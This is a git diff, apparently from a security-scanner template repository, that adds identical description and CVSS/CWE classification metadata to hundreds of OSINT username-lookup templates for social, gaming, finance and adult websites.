osint/stripchat.yaml | 5 +++++ osint/subscribestar.yaml | 5 +++++ osint/sukebeinyaasi.yaml | 5 +++++ osint/suzuri.yaml | 5 +++++ osint/szmerinfo.yaml | 5 +++++ osint/tabletoptournament.yaml | 5 +++++ osint/tagged.yaml | 5 +++++ osint/tamtam.yaml | 5 +++++ osint/tanukipl.yaml | 5 +++++ osint/tapitag.yaml | 5 +++++ osint/tappy.yaml | 5 +++++ osint/taringa.yaml | 5 +++++ osint/taskrabbit.yaml | 5 +++++ osint/teamtreehouse.yaml | 5 +++++ osint/teddygirls.yaml | 5 +++++ osint/teespring.yaml | 5 +++++ osint/teknik.yaml | 5 +++++ osint/telegram.yaml | 5 +++++ osint/tellonym.yaml | 5 +++++ osint/tenor.yaml | 5 +++++ osint/tf2-backpack-examiner.yaml | 5 +++++ osint/thegatewaypundit.yaml | 5 +++++ osint/theguardian.yaml | 5 +++++ osint/themeforest.yaml | 5 +++++ osint/thetattooforum.yaml | 5 +++++ osint/tiktok.yaml | 5 +++++ osint/tildezone-mastodon-instance.yaml | 5 +++++ osint/tinder.yaml | 5 +++++ osint/tootingch-mastodon-instance.yaml | 5 +++++ osint/totalwar.yaml | 5 +++++ osint/toyhouse.yaml | 5 +++++ osint/trackmanialadder.yaml | 5 +++++ osint/tradingview.yaml | 5 +++++ osint/trakt.yaml | 5 +++++ osint/trello.yaml | 5 +++++ osint/tripadvisor.yaml | 5 +++++ osint/truth-social.yaml | 5 +++++ osint/tumblr.yaml | 5 +++++ osint/tunefind.yaml | 5 +++++ osint/twitcasting.yaml | 5 +++++ osint/twitch.yaml | 5 +++++ osint/twitter-archived-profile.yaml | 5 +++++ osint/twitter-archived-tweets.yaml | 5 +++++ osint/twitter.yaml | 5 +++++ osint/twpro.yaml | 5 +++++ osint/ubisoft.yaml | 5 +++++ osint/udemy.yaml | 5 +++++ osint/uefconnect.yaml | 5 +++++ osint/uid.yaml | 5 +++++ osint/uiuxdevsocial-mastodon-instance.yaml | 5 +++++ osint/ultras-diary.yaml | 5 +++++ osint/ulubpl.yaml | 5 +++++ osint/unsplash.yaml | 5 +++++ osint/untappd.yaml | 5 +++++ osint/usa-life.yaml | 5 +++++ osint/utipio.yaml | 5 +++++ osint/uwuai.yaml | 5 +++++ osint/uwumarket.yaml | 5 +++++ osint/venmo.yaml | 5 +++++ osint/vero.yaml | 5 +++++ osint/vibilagare.yaml | 5 +++++ osint/viddler.yaml | 5 +++++ osint/vimeo.yaml | 5 +++++ osint/vine.yaml | 5 +++++ osint/vip-blog.yaml | 5 +++++ osint/virustotal.yaml | 5 +++++ osint/visnesscard.yaml | 5 +++++ osint/vivino.yaml | 5 +++++ osint/vk.yaml | 5 +++++ osint/vklworld-mastodon-instance.yaml | 5 +++++ osint/vmstio-mastodon-instance.yaml | 5 +++++ osint/voice123.yaml | 5 +++++ osint/voicescom.yaml | 5 +++++ osint/vsco.yaml | 5 +++++ osint/wanelo.yaml | 5 +++++ osint/warriorforum.yaml | 5 +++++ osint/watchmemorecom.yaml | 5 +++++ osint/watchmyfeed.yaml | 5 +++++ osint/wattpad.yaml | 5 +++++ osint/weasyl.yaml | 5 +++++ osint/weebly.yaml | 5 +++++ osint/wego.yaml | 5 +++++ osint/weheartit.yaml | 5 +++++ osint/weibo.yaml | 5 +++++ osint/wetransfer.yaml | 5 +++++ osint/wikidot.yaml | 5 +++++ osint/wikipedia.yaml | 5 +++++ osint/wimkin-publicprofile.yaml | 5 +++++ osint/wireclub.yaml | 5 +++++ osint/wishlistr.yaml | 5 +++++ osint/wolni-slowianie.yaml | 5 +++++ osint/wordnik.yaml | 5 +++++ osint/wordpress-support.yaml | 5 +++++ osint/wordpress.yaml | 5 +++++ osint/wowhead.yaml | 5 +++++ osint/wykop.yaml | 5 +++++ osint/xanga.yaml | 5 +++++ osint/xbox-gamertag.yaml | 5 +++++ osint/xhamster.yaml | 5 +++++ osint/xing.yaml | 5 +++++ osint/xvideos-models.yaml | 5 +++++ osint/xvideos-profiles.yaml | 5 +++++ osint/yahoo-japan-auction.yaml | 5 +++++ osint/yapishu.yaml | 5 +++++ osint/yazawaj.yaml | 5 +++++ osint/yelp.yaml | 5 +++++ osint/youpic.yaml | 5 +++++ osint/youtube.yaml | 5 +++++ osint/zatrybipl.yaml | 5 +++++ osint/zbiornik.yaml | 5 +++++ osint/zhihu.yaml | 5 +++++ osint/zillow.yaml | 5 +++++ osint/zmarsacom.yaml | 5 +++++ osint/zomato.yaml | 5 +++++ osint/zoomitir.yaml | 5 +++++ 620 files changed, 3100 insertions(+) diff --git a/osint/1001mem.yaml b/osint/1001mem.yaml index 6d4a77eb99..fc78d3c489 100644 --- a/osint/1001mem.yaml +++ b/osint/1001mem.yaml @@ -3,7 +3,12 @@ id: 1001mem info: name: 1001mem author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,1001mem self-contained: true diff --git a/osint/21buttons.yaml b/osint/21buttons.yaml index 7cf9196bf1..ee18ff6810 100644 --- a/osint/21buttons.yaml +++ b/osint/21buttons.yaml @@ -3,7 +3,12 @@ id: 21buttons info: name: 21buttons author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,21buttons self-contained: true diff --git a/osint/247sports.yaml b/osint/247sports.yaml index 3427788a68..85cc19c1b7 100644 --- a/osint/247sports.yaml +++ b/osint/247sports.yaml @@ -3,7 +3,12 @@ id: 247sports info: name: 247sports author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,247sports self-contained: true diff --git a/osint/3dnews.yaml b/osint/3dnews.yaml index 1184051ca2..f27335ed45 100644 --- a/osint/3dnews.yaml +++ b/osint/3dnews.yaml @@ -3,7 +3,12 @@ id: 3dnews info: name: 3DNews author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,3dnews self-contained: true diff --git a/osint/3dtoday.yaml b/osint/3dtoday.yaml index 166d62eb68..0779e09da2 100644 --- a/osint/3dtoday.yaml +++ b/osint/3dtoday.yaml @@ -3,7 +3,12 @@ id: 3dtoday info: name: 3dtoday author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,3dtoday self-contained: true diff --git a/osint/7cup.yaml b/osint/7cup.yaml index 2ed537989f..38d3834353 100644 --- a/osint/7cup.yaml +++ b/osint/7cup.yaml @@ -3,7 +3,12 @@ id: 7cup info: name: 7cup author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,7cup self-contained: true diff --git a/osint/7dach.yaml b/osint/7dach.yaml index 7a04819dc7..9a5e0327ce 100644 --- a/osint/7dach.yaml +++ b/osint/7dach.yaml @@ -3,7 +3,12 @@ id: 7dach info: name: 7dach author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,7dach self-contained: true diff --git a/osint/aaha-chat.yaml b/osint/aaha-chat.yaml index 183f0628e3..df3ec6526a 100644 --- a/osint/aaha-chat.yaml +++ b/osint/aaha-chat.yaml @@ -3,7 +3,12 @@ id: aaha-chat info: name: aaha_chat author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,aaha-chat self-contained: true diff --git a/osint/aboutme.yaml b/osint/aboutme.yaml index f3dece734f..537b8542d5 100644 --- a/osint/aboutme.yaml +++ b/osint/aboutme.yaml @@ -3,7 +3,12 @@ id: aboutme info: name: about.me author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,aboutme self-contained: true diff --git a/osint/acf.yaml b/osint/acf.yaml index 0881fcb731..df83990036 100644 --- a/osint/acf.yaml +++ b/osint/acf.yaml @@ -3,7 +3,12 @@ id: acf info: name: ACF author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,acf self-contained: true diff --git a/osint/admire-me.yaml b/osint/admire-me.yaml index bd11d581df..954ca83f6f 100644 --- a/osint/admire-me.yaml +++ b/osint/admire-me.yaml @@ -3,7 +3,12 @@ id: admire-me info: name: admire_me author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,admire-me self-contained: true diff --git a/osint/adult-forum.yaml b/osint/adult-forum.yaml index 0a59f70018..174493cfad 100644 --- a/osint/adult-forum.yaml +++ b/osint/adult-forum.yaml @@ -3,7 +3,12 @@ id: adult-forum info: name: Adult_Forum author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,adult-forum self-contained: true diff --git a/osint/adultism.yaml b/osint/adultism.yaml index 62d13cf69a..6bfcf861de 100644 --- a/osint/adultism.yaml +++ b/osint/adultism.yaml @@ -3,7 +3,12 @@ id: adultism info: name: adultism author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,adultism self-contained: true diff --git a/osint/advfn.yaml b/osint/advfn.yaml index 79807839e3..75b48b896e 100644 --- a/osint/advfn.yaml +++ b/osint/advfn.yaml @@ -3,7 +3,12 @@ id: advfn info: name: ADVFN author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,advfn self-contained: true diff --git a/osint/aflam.yaml b/osint/aflam.yaml index be7312410a..23b1189353 100644 --- a/osint/aflam.yaml +++ b/osint/aflam.yaml @@ -3,7 +3,12 @@ id: aflam info: name: aflam author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,aflam self-contained: true diff --git a/osint/airline-pilot-life.yaml b/osint/airline-pilot-life.yaml index d32d2115cf..fb77b10286 100644 --- a/osint/airline-pilot-life.yaml +++ b/osint/airline-pilot-life.yaml @@ -3,7 +3,12 @@ id: airline-pilot-life info: name: Airline_Pilot_Life author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,airline-pilot-life self-contained: true diff --git a/osint/airliners.yaml b/osint/airliners.yaml index 995e7364fd..7c7ef15ec1 100644 --- a/osint/airliners.yaml +++ b/osint/airliners.yaml @@ -3,7 +3,12 @@ id: airliners info: name: Airliners author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,airliners self-contained: true diff --git a/osint/akniga.yaml b/osint/akniga.yaml index ffb72d3499..17d559d5e0 100644 --- a/osint/akniga.yaml +++ b/osint/akniga.yaml @@ -3,7 +3,12 @@ id: akniga info: name: akniga author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,akniga self-contained: true diff --git a/osint/albicla.yaml b/osint/albicla.yaml index dccaab04e4..479113f63d 100644 --- a/osint/albicla.yaml +++ b/osint/albicla.yaml @@ -3,7 +3,12 @@ id: albicla info: name: Albicla author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,albicla self-contained: true diff --git a/osint/alik.yaml b/osint/alik.yaml index 2d83bc0d81..51c50bf37e 100644 --- a/osint/alik.yaml +++ b/osint/alik.yaml @@ -3,7 +3,12 @@ id: alik info: name: alik author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,alik self-contained: true diff --git a/osint/allesovercrypto.yaml b/osint/allesovercrypto.yaml index 8f89002e83..e0829dd3f0 100644 --- a/osint/allesovercrypto.yaml +++ b/osint/allesovercrypto.yaml @@ -3,7 +3,12 @@ id: allesovercrypto info: name: allesovercrypto author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,allesovercrypto self-contained: true diff --git a/osint/allmylinks.yaml b/osint/allmylinks.yaml index e4830a1bad..5085153352 100644 --- a/osint/allmylinks.yaml +++ b/osint/allmylinks.yaml @@ -3,7 +3,12 @@ id: allmylinks info: name: allmylinks author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,allmylinks self-contained: true diff --git a/osint/alloannonces.yaml b/osint/alloannonces.yaml index 7c6df7a696..bec60940e8 100644 --- a/osint/alloannonces.yaml +++ b/osint/alloannonces.yaml @@ -3,7 +3,12 @@ id: alloannonces info: name: Alloannonces author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,alloannonces self-contained: true diff --git a/osint/alltrails.yaml b/osint/alltrails.yaml index f6ea07d113..1e5ca07227 100644 --- a/osint/alltrails.yaml +++ b/osint/alltrails.yaml @@ -3,7 +3,12 @@ id: alltrails info: name: AllTrails author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,alltrails self-contained: true diff --git a/osint/ameblo.yaml b/osint/ameblo.yaml index e65bba68a8..afe14e32e5 100644 --- a/osint/ameblo.yaml +++ b/osint/ameblo.yaml @@ -3,7 +3,12 @@ id: ameblo info: name: Ameblo author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,ameblo self-contained: true diff --git a/osint/americanthinker.yaml b/osint/americanthinker.yaml index 3a8ee4c4b4..9a4356c5e4 100644 --- a/osint/americanthinker.yaml +++ b/osint/americanthinker.yaml @@ -3,7 +3,12 @@ id: americanthinker info: name: AmericanThinker author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,americanthinker self-contained: true diff --git a/osint/animeplanet.yaml b/osint/animeplanet.yaml index ee53b92282..21e49da336 100644 --- a/osint/animeplanet.yaml +++ b/osint/animeplanet.yaml @@ -3,7 +3,12 @@ id: animeplanet info: name: AnimePlanet author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,animeplanet self-contained: true diff --git a/osint/anobii.yaml b/osint/anobii.yaml index 748680e91f..9ed47d4abf 100644 --- a/osint/anobii.yaml +++ b/osint/anobii.yaml @@ -3,7 +3,12 @@ id: anobii info: name: aNobii author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,anobii self-contained: true diff --git a/osint/anonup.yaml b/osint/anonup.yaml index 72b43baaaf..05eea0f743 100644 --- a/osint/anonup.yaml +++ b/osint/anonup.yaml @@ -3,7 +3,12 @@ id: anonup info: name: anonup author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,anonup self-contained: true diff --git a/osint/apex-legends.yaml b/osint/apex-legends.yaml index d76ff2d1b9..ffb47ea3b3 100644 --- a/osint/apex-legends.yaml +++ b/osint/apex-legends.yaml @@ -3,7 +3,12 @@ id: apex-legends info: name: Apex Legends author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,apex-legends self-contained: true diff --git a/osint/appian.yaml b/osint/appian.yaml index 3a31473ad4..b2689ec560 100644 --- a/osint/appian.yaml +++ b/osint/appian.yaml @@ -3,7 +3,12 @@ id: appian info: name: Appian author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,appian self-contained: true diff --git a/osint/apteka.yaml b/osint/apteka.yaml index e1b678038e..aea1eef520 100644 --- a/osint/apteka.yaml +++ b/osint/apteka.yaml @@ -3,7 +3,12 @@ id: apteka info: name: apteka author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,apteka self-contained: true diff --git a/osint/archive-of-our-own-account.yaml b/osint/archive-of-our-own-account.yaml index b6f218045f..91c0661083 100644 --- a/osint/archive-of-our-own-account.yaml +++ b/osint/archive-of-our-own-account.yaml @@ -3,7 +3,12 @@ id: archive-of-our-own-account info: name: Archive Of Our Own Account author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,archive-of-our-own-account self-contained: true diff --git a/osint/arduino.yaml b/osint/arduino.yaml index 7847db4e22..b395c6e776 100644 --- a/osint/arduino.yaml +++ b/osint/arduino.yaml @@ -3,7 +3,12 @@ id: arduino info: name: Arduino author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,arduino self-contained: true diff --git a/osint/armorgames.yaml b/osint/armorgames.yaml index 3d53ebb06f..df0f9b142d 100644 --- a/osint/armorgames.yaml +++ b/osint/armorgames.yaml @@ -3,7 +3,12 @@ id: armorgames info: name: ArmorGames author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,armorgames self-contained: true diff --git a/osint/artbreeder.yaml b/osint/artbreeder.yaml index ad299317a7..7abcc96970 100644 --- a/osint/artbreeder.yaml +++ b/osint/artbreeder.yaml @@ -3,7 +3,12 @@ id: artbreeder info: name: ArtBreeder author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,artbreeder self-contained: true diff --git a/osint/artists-clients.yaml b/osint/artists-clients.yaml index 0050ebf1f3..824c2c4798 100644 --- a/osint/artists-clients.yaml +++ b/osint/artists-clients.yaml @@ -3,7 +3,12 @@ id: artists-clients info: name: Artists & Clients author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,artists-clients self-contained: true diff --git a/osint/artstation.yaml b/osint/artstation.yaml index 10f5da550d..29e2cc75f8 100644 --- a/osint/artstation.yaml +++ b/osint/artstation.yaml @@ -3,7 +3,12 @@ id: artstation info: name: ArtStation author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,artstation self-contained: true diff --git a/osint/asciinema.yaml b/osint/asciinema.yaml index 4ae8f3e28b..6fb46e9758 100644 --- a/osint/asciinema.yaml +++ b/osint/asciinema.yaml @@ -3,7 +3,12 @@ id: asciinema info: name: asciinema author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,asciinema self-contained: true diff --git a/osint/askfm.yaml b/osint/askfm.yaml index 0c3a134191..2b8badd5a9 100644 --- a/osint/askfm.yaml +++ b/osint/askfm.yaml @@ -3,7 +3,12 @@ id: askfm info: name: ask.fm author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,askfm self-contained: true diff --git a/osint/audiojungle.yaml b/osint/audiojungle.yaml index 48c40e211b..5d751849a3 100644 --- a/osint/audiojungle.yaml +++ b/osint/audiojungle.yaml @@ -3,7 +3,12 @@ id: audiojungle info: name: Audiojungle author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,audiojungle self-contained: true diff --git a/osint/auru.yaml b/osint/auru.yaml index dc3fad4b84..561f0ccee3 100644 --- a/osint/auru.yaml +++ b/osint/auru.yaml @@ -3,7 +3,12 @@ id: auru info: name: au.ru author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,auru self-contained: true diff --git a/osint/authorstream.yaml b/osint/authorstream.yaml index 9e56ac758e..2df1446949 100644 --- a/osint/authorstream.yaml +++ b/osint/authorstream.yaml @@ -3,7 +3,12 @@ id: authorstream info: name: authorSTREAM author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,authorstream self-contained: true diff --git a/osint/avid-community.yaml b/osint/avid-community.yaml index 98861af186..054ea847a3 100644 --- a/osint/avid-community.yaml +++ b/osint/avid-community.yaml @@ -3,7 +3,12 @@ id: avid-community info: name: Avid Community author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,avid-community self-contained: true diff --git a/osint/babepedia.yaml b/osint/babepedia.yaml index 3a11f76381..3d5900d0db 100644 --- a/osint/babepedia.yaml +++ b/osint/babepedia.yaml @@ -3,7 +3,12 @@ id: babepedia info: name: babepedia author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,babepedia self-contained: true diff --git a/osint/babypips.yaml b/osint/babypips.yaml index f14c57cc0b..f60a8e2edb 100644 --- a/osint/babypips.yaml +++ b/osint/babypips.yaml @@ -3,7 +3,12 @@ id: babypips info: name: BabyPips author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,babypips self-contained: true diff --git a/osint/bandcamp.yaml b/osint/bandcamp.yaml index 19406f05bf..a34663c16c 100644 --- a/osint/bandcamp.yaml +++ b/osint/bandcamp.yaml @@ -3,7 +3,12 @@ id: bandcamp info: name: Bandcamp author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,bandcamp self-contained: true diff --git a/osint/bandlab.yaml b/osint/bandlab.yaml index 3a8d06fdf9..9e5ee25cb1 100644 --- a/osint/bandlab.yaml +++ b/osint/bandlab.yaml @@ -3,7 +3,12 @@ id: bandlab info: name: Bandlab author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,bandlab self-contained: true diff --git a/osint/bblog-ru.yaml b/osint/bblog-ru.yaml index 1c180b0f84..f28188df8b 100644 --- a/osint/bblog-ru.yaml +++ b/osint/bblog-ru.yaml @@ -3,7 +3,12 @@ id: bblog-ru info: name: bblog_ru author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,bblog-ru self-contained: true diff --git a/osint/bdsmlr.yaml b/osint/bdsmlr.yaml index 4dacdd1134..c1e404ad71 100644 --- a/osint/bdsmlr.yaml +++ b/osint/bdsmlr.yaml @@ -3,7 +3,12 @@ id: bdsmlr info: name: BDSMLR author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,bdsmlr self-contained: true diff --git a/osint/bdsmsingles.yaml b/osint/bdsmsingles.yaml index 5dc2e7b64e..0a9cf10563 100644 --- a/osint/bdsmsingles.yaml +++ b/osint/bdsmsingles.yaml @@ -3,7 +3,12 @@ id: bdsmsingles info: name: bdsmsingles author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,bdsmsingles 